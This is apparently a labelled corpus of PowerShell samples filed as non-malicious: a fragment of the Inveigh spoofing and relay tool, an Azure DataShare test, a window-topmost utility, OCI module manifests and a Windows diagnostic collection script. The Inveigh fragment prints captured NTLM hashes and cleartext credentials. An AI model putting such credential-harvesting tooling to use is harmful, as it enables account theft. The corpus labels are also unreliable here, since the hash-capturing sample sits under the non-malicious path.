$unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
{
Write-Output $unique_NTLMv1
}
$unique_NTLMv1_account_last = $unique_NTLMv1_account
}
}
if($NTLMv1Usernames)
{
Write-Output $inveigh.NTLMv2_username_list
}
if($NTLMv2)
{
Write-Output $inveigh.NTLMv2_list
}
if($NTLMv2Unique)
{
$inveigh.NTLMv2_list.Sort()
foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
{
$unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
{
Write-Output $unique_NTLMv2
}
$unique_NTLMv2_account_last = $unique_NTLMv2_account
}
}
if($NTLMv2Usernames)
{
Write-Output $inveigh.NTLMv2_username_list
}
if($Cleartext)
{
Write-Output $inveigh.cleartext_list
}
if($CleartextUnique)
{
Write-Output $inveigh.cleartext_list | Get-Unique
}
if($POSTRequest)
{
Write-Output $inveigh.POST_request_list
}
if($POSTRequestUnique)
{
Write-Output $inveigh.POST_request_list | Get-Unique
}
if($Learning)
{
Write-Output $inveigh.valid_host_list
}
}
function Watch-Inveigh
{
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y",
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
if($inveigh.tool -ne 1)
{
if($inveigh.running -or $inveigh.relay_running)
{
Write-Output "Press any key to stop real time console output"
$inveigh.console_output = $true
:console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
{
while($inveigh.console_queue.Count -gt 0)
{
switch -wildcard ($inveigh.console_queue[0])
{
{$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
}
{$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
{
if($ConsoleOutput -eq 'Y')
{
Write-Output $inveigh.console_queue[0]
}
$inveigh.console_queue.RemoveAt(0)
}
{$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
{
if($ConsoleOutput -ne "Low")
{
Write-Output $inveigh.console_queue[0]
}
$inveigh.console_queue.RemoveAt(0)
}
default
{
Write-Output $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
}
}
}
if([Console]::KeyAvailable)
{
$inveigh.console_output = $false
BREAK console_loop
}
Start-Sleep -m 5
}
}
else
{
Write-Output "Inveigh isn't running"
}
}
else
{
Write-Output "Watch-Inveigh cannot be used with current external tool selection"
}
}
function Clear-Inveigh
{
if($inveigh)
{
if(!$inveigh.running -and !$inveigh.relay_running)
{
Remove-Variable inveigh -scope global
Write-Output "Inveigh data has been cleared from memory"
}
else
{
Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
}
}
}
|
combined_dataset/train/non-malicious/3680.ps1
|
3680.ps1
|
function Test-AdlsGen1Crud
{
$resourceGroup = getAssetName
try
{
$AccountName = getAssetName
$ShareName = getAssetName
$DataSetName = getAssetName
$StorageAccountId = getAssetName
$FolderPath = getAssetName
$FileName = getAssetName
$createdFolderDataset = New-AzDataShareDataSet -ResourceGroupName $resourceGroup -AccountName $AccountName -ShareName $ShareName -Name $DataSetName -StorageAccountResourceId $StorageAccountId -AdlsGen1FolderPath $FolderPath
Assert-NotNull $createdFolderDataset
Assert-AreEqual $DataSetName $createdFolderDataset.Name
$createdFileDataset = New-AzDataShareDataSet -ResourceGroupName $resourceGroup -AccountName $AccountName -ShareName $ShareName -Name $DataSetName -StorageAccountResourceId $StorageAccountId -AdlsGen1FolderPath $FolderPath -FileName $FileName
Assert-NotNull $createdFileDataset
Assert-AreEqual $DataSetName $createdFileDataset.Name
}
finally
{
Remove-AzResourceGroup -Name $resourceGroup -Force
}
}
|
combined_dataset/train/non-malicious/Set-TopMost.ps1
|
Set-TopMost.ps1
|
#Requires -Version 2.0
$signature = @"
[DllImport("user32.dll")]
public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);
public static IntPtr FindWindow(string windowName){
return FindWindow(null,windowName);
}
[DllImport("user32.dll")]
public static extern bool SetWindowPos(IntPtr hWnd,
IntPtr hWndInsertAfter, int X,int Y, int cx, int cy, uint uFlags);
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
static readonly IntPtr HWND_TOPMOST = new IntPtr(-1);
static readonly IntPtr HWND_NOTOPMOST = new IntPtr(-2);
const UInt32 SWP_NOSIZE = 0x0001;
const UInt32 SWP_NOMOVE = 0x0002;
const UInt32 TOPMOST_FLAGS = SWP_NOMOVE | SWP_NOSIZE;
public static void MakeTopMost (IntPtr fHandle)
{
SetWindowPos(fHandle, HWND_TOPMOST, 0, 0, 0, 0, TOPMOST_FLAGS);
}
public static void MakeNormal (IntPtr fHandle)
{
SetWindowPos(fHandle, HWND_NOTOPMOST, 0, 0, 0, 0, TOPMOST_FLAGS);
}
"@
$app = Add-Type -MemberDefinition $signature -Name Win32Window -Namespace ScriptFanatic.WinAPI -ReferencedAssemblies System.Windows.Forms -Using System.Windows.Forms -PassThru
function Set-TopMost
{
param(
[Parameter(
Position=0,ValueFromPipelineByPropertyName=$true
)][Alias('MainWindowHandle')]$hWnd=0,
[Parameter()][switch]$Disable
)
if($hWnd -ne 0)
{
if($Disable)
{
Write-Verbose "Set process handle :$hWnd to NORMAL state"
$null = $app::MakeNormal($hWnd)
return
}
Write-Verbose "Set process handle :$hWnd to TOPMOST state"
$null = $app::MakeTopMost($hWnd)
}
else
{
Write-Verbose "$hWnd is 0"
}
}
function Get-WindowByTitle($WindowTitle="*")
{
Write-Verbose "WindowTitle is: $WindowTitle"
if($WindowTitle -eq "*")
{
Write-Verbose "WindowTitle is *, print all windows title"
Get-Process | Where-Object {$_.MainWindowTitle} | Select-Object Id,Name,MainWindowHandle,MainWindowTitle
}
else
{
Write-Verbose "WindowTitle is $WindowTitle"
Get-Process | Where-Object {$_.MainWindowTitle -like "*$WindowTitle*"} | Select-Object Id,Name,MainWindowHandle,MainWindowTitle
}
}
Exaples:
# set powershell console on top of other windows
gps powershell | Set-TopMost
# unset
gps powershell | Set-TopMost -disable
# set an application on top of other windows by its windows title (wildcard is supported)
Get-WindowByTitle *pad* | Set-TopMost
# unset
Get-WindowByTitle textpad | Set-TopMost -Disable
|
combined_dataset/train/non-malicious/sample_54_53.ps1
|
sample_54_53.ps1
|
#
# Module manifest for module 'OCI.PSModules.Keymanagement'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Keymanagement.dll'
# Version number of this module.
ModuleVersion = '83.1.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '4a9c2614-4d97-430e-b149-edbf0d70bf0b'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Keymanagement Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.1.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Keymanagement.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Backup-OCIKeymanagementKey', 'Backup-OCIKeymanagementVault',
'Disable-OCIKeymanagementKey', 'Enable-OCIKeymanagementKey',
'Export-OCIKeymanagementKey',
'Get-OCIKeymanagementEkmsPrivateEndpoint',
'Get-OCIKeymanagementEkmsPrivateEndpointsList',
'Get-OCIKeymanagementHsmCluster',
'Get-OCIKeymanagementHsmClustersList',
'Get-OCIKeymanagementHsmPartition',
'Get-OCIKeymanagementHsmPartitionsList', 'Get-OCIKeymanagementKey',
'Get-OCIKeymanagementKeysList', 'Get-OCIKeymanagementKeyVersion',
'Get-OCIKeymanagementKeyVersionsList',
'Get-OCIKeymanagementPreCoUserCredentials',
'Get-OCIKeymanagementReplicationStatus',
'Get-OCIKeymanagementVault',
'Get-OCIKeymanagementVaultReplicasList',
'Get-OCIKeymanagementVaultsList', 'Get-OCIKeymanagementVaultUsage',
'Get-OCIKeymanagementWrappingKey', 'Import-OCIKeymanagementKey',
'Import-OCIKeymanagementKeyVersion',
'Invoke-OCIKeymanagementDecrypt',
'Invoke-OCIKeymanagementDownloadCertificateSigningRequest',
'Invoke-OCIKeymanagementEncrypt',
'Invoke-OCIKeymanagementScheduleHsmClusterDeletion',
'Invoke-OCIKeymanagementScheduleKeyDeletion',
'Invoke-OCIKeymanagementScheduleKeyVersionDeletion',
'Invoke-OCIKeymanagementScheduleVaultDeletion',
'Invoke-OCIKeymanagementSign', 'Invoke-OCIKeymanagementVerify',
'Move-OCIKeymanagementHsmClusterCompartment',
'Move-OCIKeymanagementKeyCompartment',
'Move-OCIKeymanagementVaultCompartment',
'New-OCIKeymanagementDataEncryptionKey',
'New-OCIKeymanagementEkmsPrivateEndpoint',
'New-OCIKeymanagementHsmCluster', 'New-OCIKeymanagementKey',
'New-OCIKeymanagementKeyVersion', 'New-OCIKeymanagementVault',
'New-OCIKeymanagementVaultReplica',
'Remove-OCIKeymanagementEkmsPrivateEndpoint',
'Remove-OCIKeymanagementVaultReplica',
'Restore-OCIKeymanagementKeyFromFile',
'Restore-OCIKeymanagementKeyFromObjectStore',
'Restore-OCIKeymanagementVaultFromFile',
'Restore-OCIKeymanagementVaultFromObjectStore',
'Stop-OCIKeymanagementHsmClusterDeletion',
'Stop-OCIKeymanagementKeyDeletion',
'Stop-OCIKeymanagementKeyVersionDeletion',
'Stop-OCIKeymanagementVaultDeletion',
'Update-OCIKeymanagementEkmsPrivateEndpoint',
'Update-OCIKeymanagementHsmCluster', 'Update-OCIKeymanagementKey',
'Update-OCIKeymanagementVault',
'Write-OCIKeymanagementPartitionCertificates'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Keymanagement'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_24_17.ps1
|
sample_24_17.ps1
|
#
# Module manifest for module 'OCI.PSModules.Functions'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Functions.dll'
# Version number of this module.
ModuleVersion = '80.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '21b96577-939f-4757-b9c9-34f5b0c1c54b'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Functions Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '80.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Functions.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIFunctionsApplication', 'Get-OCIFunctionsApplicationsList',
'Get-OCIFunctionsFunction', 'Get-OCIFunctionsList',
'Get-OCIFunctionsPbfListing', 'Get-OCIFunctionsPbfListingsList',
'Get-OCIFunctionsPbfListingVersion',
'Get-OCIFunctionsPbfListingVersionsList',
'Get-OCIFunctionsTriggersList', 'Invoke-OCIFunctionsFunction',
'Move-OCIFunctionsApplicationCompartment',
'New-OCIFunctionsApplication', 'New-OCIFunctionsFunction',
'Remove-OCIFunctionsApplication', 'Remove-OCIFunctionsFunction',
'Update-OCIFunctionsApplication', 'Update-OCIFunctionsFunction'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Functions'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_8_0.ps1
|
sample_8_0.ps1
|
# 2023-02-24 WalterE mod Trap #we#
$startTime_AutoAdd = Get-Date
trap [Exception]{
WriteTo-StdOut "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_" -shortformat; continue
Write-Host "$($_.InvocationInfo.ScriptName)($($_.InvocationInfo.ScriptLineNumber)): $_"
}
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Common ---"
# version of the psSDP Diagnostic
Run-DiagExpression .\DC_NetworkingDiagnostic.ps1
# MSInfo
Run-DiagExpression .\DC_MSInfo.ps1
# Obtain pstat output
Run-DiagExpression .\DC_PStat.ps1
# CheckSym
Run-DiagExpression .\DC_ChkSym.ps1
# AutoRuns Information
Run-DiagExpression .\DC_Autoruns.ps1
# Collects Windows Server 2008/R2 Server Manager Information
Run-DiagExpression .\DC_ServerManagerInfo.ps1
# List Schedule Tasks using schtasks.exe utility
Run-DiagExpression .\DC_ScheduleTasks.ps1
# Collects System and Application Event Logs
Run-DiagExpression .\DC_SystemAppEventLogs.ps1
# Collect Machine Registry Information for Setup and Performance Diagnostics
Run-DiagExpression .\DC_RegistrySetupPerf.ps1
# GPResults.exe Output
Run-DiagExpression .\DC_RSoP.ps1
# Basic System Information
Run-DiagExpression .\DC_BasicSystemInformation.ps1
# Collects information about Driver Verifier (verifier.exe utility)
Run-DiagExpression .\DC_Verifier.ps1
# Collects BCD information via BCDInfo tool or boot.ini
Run-DiagExpression .\DC_BCDInfo.ps1
# Obtain information about Devices and connections using devcon.exe utility
Run-DiagExpression .\DC_Devcon.ps1
#_# Collects Windows Server 2008/R2 Server Manager Information
Run-DiagExpression .\DC_ServerManagerLogs.ps1
#_# DBErr Data Collector
Run-DiagExpression .\DC_DBErr.ps1
# User Rights (privileges) via the userrights.exe tool
Run-DiagExpression .\DC_UserRights.ps1
# WhoAmI
Run-DiagExpression .\DC_Whoami.ps1
# PoolMon
Run-DiagExpression .\DC_PoolMon.ps1
#_# Collect summary report
Run-DiagExpression .\DC_SummaryReliability.ps1
# Collects registry entries for KIR (for 2019) and RBC (for 2016)
Run-DiagExpression .\DC_KIR-RBC-RegEntries.ps1
# TaskListSvc
Run-DiagExpression .\DC_TaskListSvc.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Net ---"
# DHCP Client Component
Run-DiagExpression .\DC_DhcpClient-Component.ps1
# DNS Client Component
Run-DiagExpression .\DC_DNSClient-Component.ps1
# Firewall
Run-DiagExpression .\DC_Firewall-Component.ps1
# Capture pfirewall.log
Run-DiagExpression .\DC_PFirewall.ps1
# IPsec
Run-DiagExpression .\DC_IPsec-Component.ps1
# NetLBFO
Run-DiagExpression .\DC_NetLBFO-Component.ps1
# RPC
Run-DiagExpression .\DC_RPC-Component.ps1
# SMB Client Component
Run-DiagExpression .\DC_SMBClient-Component.ps1
# SMB Server Component
Run-DiagExpression .\DC_SMBServer-Component.ps1
# TCPIP Component
Run-DiagExpression .\DC_TCPIP-Component.ps1
# WINSClient
Run-DiagExpression .\DC_WINSClient-Component.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: HyperV ---"
# Hyper-V Info
Run-DiagExpression .\DC_HyperVBasicInfo.ps1
# Hyper-V Networking Settings
Run-DiagExpression .\DC_HyperVNetworking.ps1
# Hyper-V Network Virtualization
Run-DiagExpression .\DC_HyperVNetworkVirtualization.ps1
# Collect the VMGuestSetup.Log file
Run-DiagExpression .\DC_VMGuestSetupLogCollector.ps1
# Information about Hyper-V, including Virtual Machine Files and Hyper-V Event Logs
Run-DiagExpression .\DC_HyperVFiles.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Print ---"
# Collect Print Registry Keys
Run-DiagExpression .\DC_RegPrintKeys.ps1
# Perf/Printing Event Logs
Run-DiagExpression .\DC_PerfPrintEventLogs.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Storage ---"
# By adding San.exe to the SDP manifest we should be able to solve cases that have a 512e or Advanced Format (4K) disk in it faster.
Run-DiagExpression .\DC_SanStorageInfo.ps1
# Collects Fiber Channel information using fcinfo utility
Run-DiagExpression .\DC_FCInfo.ps1
# Collects DiskInfo - related data for Disk Diagnostics
Run-DiagExpression .\DC_DiskInfo.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Setup ---"
#_# Enumerate minifilter drivers via Fltmc.exe command
Run-DiagExpression .\DC_Fltmc.ps1
#_# Obtain information about Upper and lower filters Information fltrfind.exe utility
Run-DiagExpression .\DC_Fltrfind.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: SQL ---"
# SQL Server Log Collector
Run-DiagExpression .\DC_CollectSqlLogs.ps1 -Instances $null -CollectSqlErrorlogs -CollectSqlAgentLogs
# SQL Server XE System Health Collector
Run-DiagExpression .\DC_GetSqlXeLogs.ps1 -Instances $null -CollectSqlDefaultDiagnosticXeLogs -CollectFailoverClusterDiagnosticXeLogs -CollectAlwaysOnDiagnosticXeLogs
# SQL Server minidump files Collector
Run-DiagExpression .\DC_CollectSqlMinidumps.ps1 -Instances $null
# SQL Server Log Collector
Run-DiagExpression .\DC_RunSqlDiagScripts.ps1 -Instances $null -CollectSqlDiag -CollectAlwaysOnInfo
# Misc_SQL_Keys
Run-DiagExpression .\DC_SQL_Registries.ps1
# SQL Server Analysis Services Registry Key Collector
Run-DiagExpression .\DC_GetOlapServerConfigFiles.ps1
# SQL Server Analysis Services Registry Key Collector
Run-DiagExpression .\DC_CollectSsasRegKeys.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: WinRM ---"
# Collects Windows Remote Management Event log
Run-DiagExpression .\DC_WinRMEventLogs.ps1
# Collects WSMAN and WinRM binary details info
Run-DiagExpression .\DC_WSMANWinRMInfo.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Update ---"
# Update History
Run-DiagExpression .\DC_UpdateHistory.ps1
# Collect WindowsUpdate.Log
Run-DiagExpression .\DC_WindowsUpdateLog.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Exchange ---"
# ExchDump
Run-DiagExpression .\DC_Ex2003_ExchDump.ps1
# ExBPA_2003
if ($Global:skipBPA -ne $true) {
Run-DiagExpression .\DC_Ex2003_ExBPAcmd.ps1
}
# Collects PowerShell - related Event Logs for Exchange Server Diagnostics
Run-DiagExpression .\DC_ExchangeServerEventLogs.ps1
# ExchDump
Run-DiagExpression .\DC_Exchange_RegKeys.ps1
# ExBPAcmd
if ($Global:skipBPA -ne $true) {
Run-DiagExpression .\DC_Ex_ExBPAcmd.ps1
}
# Exchange Server 2007-2010 Comprehensive Data Collection
Run-DiagExpression .\DC_GetExchange2007_2010Data.ps1
# Exchange Server 2013 Comprehensive Data Collection
Run-DiagExpression .\DC_GetExchange2013Data.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Cluster ---"
# Collects Cluster Logs
Run-DiagExpression .\DC_ClusterLogs.ps1
# Export cluster resources properties to a file (2K8 R2 and newer)
Run-DiagExpression .\DC_ClusterResourcesProperties.ps1
# Collects Cluster Groups Resource Dependency Report (Win2K8R2)
Run-DiagExpression .\DC_ClusterDependencyReport.ps1
# Collects Cluster - related Event Logs for Cluster Diagnostics
Run-DiagExpression .\DC_ClusterEventLogs.ps1
#_# Collects Cluster - related registry keys
Run-DiagExpression .\DC_RegistryCluster.ps1
# Information about Windows 2008 R2 Cluster Shared Volumes
Run-DiagExpression .\DC_CSVInfo.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase module: Performance Data ---"
# Performance Monitor - System Performance Data Collector
Run-DiagExpression .\TS_PerfmonSystemPerf.ps1 -NumberOfSeconds 60 -DataCollectorSetXMLName "SystemPerformance.xml"
# NetworkAdapters
Run-DiagExpression .\DC_NetworkAdapters-Component.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Collect Phase: Done ---"
Write-Host "...Next step: Troubleshooting section, if it hangs, run script with parameter SkipTS"
if ($Global:skipTS -ne $true) {
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_common ---"
# Detects and alerts evaluation media
Run-DiagExpression .\TS_EvalMediaDetection.ps1
# Debug/GFlags check
Run-DiagExpression .\TS_DebugFlagsCheck.ps1
# Information about Processes resource usage and top Kernel memory tags
Run-DiagExpression .\TS_ProcessInfo.ps1
# RC_32GBMemoryKB2634907
Run-DiagExpression .\RC_32GBMemoryKB2634907.ps1
# Checking if Registry Size Limit setting is present on the system
Run-DiagExpression .\TS_RegistrySizeLimitCheck.ps1
# Running powercfg.exe to obtain power settings information
Run-DiagExpression .\TS_PowerCFG.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Net ---"
# Check for ephemeral port usage
Run-DiagExpression .\TS_PortUsage.ps1
# RC_KB2647170_CnameCheck
Run-DiagExpression .\RC_KB2647170_CnameCheck.ps1
# FirewallCheck
Run-DiagExpression .\RC_FirewallCheck.ps1
# IPv66To4Check
Run-DiagExpression .\RC_IPv66To4Check.ps1
# RC_HTTPRedirectionTSGateway
Run-DiagExpression .\RC_HTTPRedirectionTSGateway.ps1
# [Idea ID 6530] [Windows] Check for any configured RPC port range which may cause issues with DCOM or DTC components
Run-DiagExpression .\TS_RPCPortRangeCheck.ps1
# [Idea ID 2387] [Windows] Verify if RPC connection a configured to accept only Authenticated sessions
Run-DiagExpression .\TS_RPCUnauthenticatedSessions.ps1
# SMB2ClientDriverStateCheck
Run-DiagExpression .\TS_SMB2ClientDriverStateCheck.ps1
# SMB2ServerDriverStateCheck
Run-DiagExpression .\TS_SMB2ServerDriverStateCheck.ps1
# Opportunistic Locking has been disabled and may impact performance.
Run-DiagExpression .\TS_LockingKB296264Check.ps1
# Evaluates whether InfocacheLevel should be increased to 0x10 hex. To resolve slow logon, slow boot issues.
Run-DiagExpression .\TS_InfoCacheLevelCheck.ps1
# IPv6Check
Run-DiagExpression .\TS_IPv6Check.ps1
# PMTU Check
Run-DiagExpression .\TS_PMTUCheck.ps1
# Checks for modified TcpIP Reg Parameters and recommend KB
Run-DiagExpression .\TS_TCPIPSettingsCheck.ps1
# 'Checks if the number of 6to4 adapters is larger than the number of physical adapters
Run-DiagExpression .\TS_AdapterKB980486Check.ps1
# Checks files in the LanmanServer, if any at .PST files a file is created with listing all of the files in the directory
Run-DiagExpression .\TS_NetFilePSTCheck.ps1
# Checks if Windows Server 2008 R2 SP1, Hyper-V, and Tunnel.sys driver are installed if they are generate alert
Run-DiagExpression .\TS_ServerCoreKB978309Check.ps1
# Detect MTU of 1514
Run-DiagExpression .\TS_DetectMTU1514.ps1
# DetectLowPathMTU
#_# Run-DiagExpression .\TS_DetectLowPathMTU.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_HyperV ---"
# Hyper-V Info 2008R2
Run-DiagExpression .\TS_HyperVInfo.ps1
# Detect Virtualization
Run-DiagExpression .\TS_Virtualization.ps1
